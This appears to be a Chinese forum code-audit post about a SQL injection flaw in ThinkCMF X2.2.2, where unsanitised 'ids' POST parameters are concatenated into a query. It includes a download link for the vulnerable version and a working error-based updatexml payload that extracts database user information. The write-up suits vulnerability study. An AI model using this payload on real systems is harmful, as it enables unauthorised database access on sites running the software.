ThinkCMF SQL注入漏洞

spider   ·   发表于 2021-10-10 18:27:07   ·   代码审计

漏洞介绍

ThinkCMF是一套基于ThinkPHP的CMS(内容管理系统)。

ThinkCMF X2.2.2版本中存在SQL注入漏洞。远程攻击者可借助ArticleController.class.php文件的edit_post方法利用该漏洞执行SQL命令。

下载地址

ThinkCMFX2.2.2下载链接:https://pan.baidu.com/s/1rK1-_BLmH1VPXsIUfr1VUw 提取码:wuhw

安装搭建步骤


检测点击下一步

0x01 CommentadminController.class.php 中函数 check() 和 delete() 的 SQL 注入

该漏洞位于.62行的check/delete方法中/application/Comment/Controller/CommentadminController.class.php,$_POST[‘ids’]参数在join()函数后传递给where语句,但没有使用inwhere子句的方法,而是直接拼接到SQL语句中,导致SQL注入。该漏洞需要管理员

  1. Payload:
  2. http: //127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1
  3. POST : ids[]= 1 &ids[]= 2 and updatexml ( 1 , concat ( 0x7e ,( SELECT user()) ) , 0x7e ), 1 )

用户名金币积分时间理由
Track-聂风 35.00 0 2021-10-29 16:04:53 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2021-10-10 | 986 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.